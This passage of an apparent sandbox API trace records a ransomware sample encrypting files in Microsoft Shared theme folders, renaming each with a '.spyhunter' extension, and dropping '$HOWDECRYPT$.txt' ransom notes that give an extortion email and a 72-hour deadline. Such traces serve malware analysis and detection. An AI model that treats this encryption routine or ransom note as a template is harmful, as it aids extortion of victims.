lpNewFilePointer=0xffffffff) returned 1 [0090.463] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x248fdf4*=0x2800, lpOverlapped=0x0) returned 1 [0090.463] GetProcessHeap () returned 0x2c0000 [0090.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.463] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.464] WriteFile (in: hFile=0x15c, lpBuffer=0x248fe34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x248fe34*, lpNumberOfBytesWritten=0x248fdf4*=0x4, lpOverlapped=0x0) returned 1 [0090.464] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdf4*=0x30, lpOverlapped=0x0) returned 1 [0090.464] CloseHandle (hObject=0x15c) returned 1 [0090.465] GetProcessHeap () returned 0x2c0000 [0090.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0090.465] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.spyhunter") returned 91 [0090.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.spyhunter")) returned 1 [0090.467] GetProcessHeap () returned 0x2c0000 [0090.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0090.467] GetProcessHeap () returned 0x2c0000 [0090.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.467] GetProcessHeap () returned 0x2c0000 [0090.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3412d0 | out: hHeap=0x2c0000) returned 1 [0090.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe38 | out: pbBuffer=0x248fe38) returned 1 [0090.467] GetProcessHeap () returned 0x2c0000 [0090.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe30*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe30*=0x30) returned 1 [0090.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0090.468] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.468] GetProcessHeap () returned 0x2c0000 [0090.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.468] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x248fdf4*=0x1400, lpOverlapped=0x0) returned 1 [0090.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.566] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x248fdf4*=0x1400, lpOverlapped=0x0) returned 1 [0090.566] GetProcessHeap () returned 0x2c0000 [0090.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.567] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.567] WriteFile (in: hFile=0x15c, lpBuffer=0x248fe34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x248fe34*, lpNumberOfBytesWritten=0x248fdf4*=0x4, lpOverlapped=0x0) returned 1 [0090.567] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdf4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdf4*=0x30, lpOverlapped=0x0) returned 1 [0090.567] CloseHandle (hObject=0x15c) returned 1 [0090.568] GetProcessHeap () returned 0x2c0000 [0090.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.568] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.spyhunter") returned 90 [0090.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.spyhunter")) returned 1 [0090.569] GetProcessHeap () returned 0x2c0000 [0090.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0090.569] GetProcessHeap () returned 0x2c0000 [0090.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.569] GetProcessHeap () returned 0x2c0000 [0090.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3411e0 | out: hHeap=0x2c0000) returned 1 [0090.569] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe30 | out: pbBuffer=0x248fe30) returned 1 [0090.569] GetProcessHeap () returned 0x2c0000 [0090.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.569] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe28*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe28*=0x30) returned 1 [0090.569] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0090.694] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.694] GetProcessHeap () returned 0x2c0000 [0090.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0090.694] ReadFile (in: hFile=0x15c, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdec, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x248fdec*=0x2800, lpOverlapped=0x0) returned 1 [0090.844] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.845] WriteFile (in: hFile=0x15c, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdec, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x248fdec*=0x2800, lpOverlapped=0x0) returned 1 [0090.845] GetProcessHeap () returned 0x2c0000 [0090.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0090.845] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.845] WriteFile (in: hFile=0x15c, lpBuffer=0x248fe2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdec, lpOverlapped=0x0 | out: lpBuffer=0x248fe2c*, lpNumberOfBytesWritten=0x248fdec*=0x4, lpOverlapped=0x0) returned 1 [0090.919] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdec, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdec*=0x30, lpOverlapped=0x0) returned 1 [0090.919] CloseHandle (hObject=0x15c) returned 1 [0090.920] GetProcessHeap () returned 0x2c0000 [0090.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.921] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.spyhunter") returned 90 [0090.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.spyhunter")) returned 1 [0090.922] GetProcessHeap () returned 0x2c0000 [0090.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.922] GetProcessHeap () returned 0x2c0000 [0090.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0090.922] GetProcessHeap () returned 0x2c0000 [0090.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3412d0 | out: hHeap=0x2c0000) returned 1 [0090.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.926] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.926] WriteFile (in: hFile=0x15c, lpBuffer=0x248fd63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x248fd63*, lpNumberOfBytesWritten=0x248fe8c*=0x127, lpOverlapped=0x0) returned 1 [0090.927] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.927] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe8c*=0x2ac, lpOverlapped=0x0) returned 1 [0090.928] CloseHandle (hObject=0x15c) returned 1 [0090.928] GetProcessHeap () returned 0x2c0000 [0090.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3421d0 | out: hHeap=0x2c0000) returned 1 [0090.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe28 | out: pbBuffer=0x248fe28) returned 1 [0090.928] GetProcessHeap () returned 0x2c0000 [0090.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0090.928] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe20*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe20*=0x30) returned 1 [0090.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.943] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0090.943] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.943] GetProcessHeap () returned 0x2c0000 [0090.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c300d8 [0090.943] ReadFile (in: hFile=0x178, lpBuffer=0x2c300d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesRead=0x248fde4*=0x2800, lpOverlapped=0x0) returned 1 [0090.986] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.986] WriteFile (in: hFile=0x178, lpBuffer=0x2c300d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesWritten=0x248fde4*=0x2800, lpOverlapped=0x0) returned 1 [0090.986] GetProcessHeap () returned 0x2c0000 [0090.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c300d8 | out: hHeap=0x2c0000) returned 1 [0090.987] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.987] WriteFile (in: hFile=0x178, lpBuffer=0x248fe24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x248fe24*, lpNumberOfBytesWritten=0x248fde4*=0x4, lpOverlapped=0x0) returned 1 [0090.987] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fde4*=0x30, lpOverlapped=0x0) returned 1 [0090.987] CloseHandle (hObject=0x178) returned 1 [0090.988] GetProcessHeap () returned 0x2c0000 [0090.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.988] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.spyhunter") returned 88 [0090.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.spyhunter")) returned 1 [0091.015] GetProcessHeap () returned 0x2c0000 [0091.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.015] GetProcessHeap () returned 0x2c0000 [0091.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.015] GetProcessHeap () returned 0x2c0000 [0091.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x380448 | out: hHeap=0x2c0000) returned 1 [0091.015] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe28 | out: pbBuffer=0x248fe28) returned 1 [0091.015] GetProcessHeap () returned 0x2c0000 [0091.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.015] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe20*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe20*=0x30) returned 1 [0091.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.024] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0091.024] StrStrW (lpFirst="THEMES.INF", lpSrch=".txt") returned 0x0 [0091.024] GetProcessHeap () returned 0x2c0000 [0091.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.025] ReadFile (in: hFile=0x178, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x248fde4*=0x1c6c, lpOverlapped=0x0) returned 1 [0091.034] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe394, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.034] WriteFile (in: hFile=0x178, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x1c6c, lpNumberOfBytesWritten=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x248fde4*=0x1c6c, lpOverlapped=0x0) returned 1 [0091.034] GetProcessHeap () returned 0x2c0000 [0091.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.034] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.034] WriteFile (in: hFile=0x178, lpBuffer=0x248fe24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x248fe24*, lpNumberOfBytesWritten=0x248fde4*=0x4, lpOverlapped=0x0) returned 1 [0091.034] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fde4, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fde4*=0x30, lpOverlapped=0x0) returned 1 [0091.034] CloseHandle (hObject=0x178) returned 1 [0091.035] GetProcessHeap () returned 0x2c0000 [0091.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.035] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.spyhunter") returned 80 [0091.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf.spyhunter")) returned 1 [0091.036] GetProcessHeap () returned 0x2c0000 [0091.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.036] GetProcessHeap () returned 0x2c0000 [0091.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.036] GetProcessHeap () returned 0x2c0000 [0091.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e050 | out: hHeap=0x2c0000) returned 1 [0091.036] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe20 | out: pbBuffer=0x248fe20) returned 1 [0091.036] GetProcessHeap () returned 0x2c0000 [0091.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.036] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe18*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe18*=0x30) returned 1 [0091.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.037] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0091.037] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0091.037] GetProcessHeap () returned 0x2c0000 [0091.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.037] ReadFile (in: hFile=0x178, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fddc, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x248fddc*=0x2800, lpOverlapped=0x0) returned 1 [0091.073] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.073] WriteFile (in: hFile=0x178, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fddc, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x248fddc*=0x2800, lpOverlapped=0x0) returned 1 [0091.073] GetProcessHeap () returned 0x2c0000 [0091.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.074] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.074] WriteFile (in: hFile=0x178, lpBuffer=0x248fe1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fddc, lpOverlapped=0x0 | out: lpBuffer=0x248fe1c*, lpNumberOfBytesWritten=0x248fddc*=0x4, lpOverlapped=0x0) returned 1 [0091.125] WriteFile (in: hFile=0x178, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fddc, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fddc*=0x30, lpOverlapped=0x0) returned 1 [0091.126] CloseHandle (hObject=0x178) returned 1 [0091.126] GetProcessHeap () returned 0x2c0000 [0091.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.127] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.spyhunter") returned 91 [0091.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.spyhunter")) returned 1 [0091.137] GetProcessHeap () returned 0x2c0000 [0091.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.137] GetProcessHeap () returned 0x2c0000 [0091.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.138] GetProcessHeap () returned 0x2c0000 [0091.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x342b30 | out: hHeap=0x2c0000) returned 1 [0091.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.138] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at 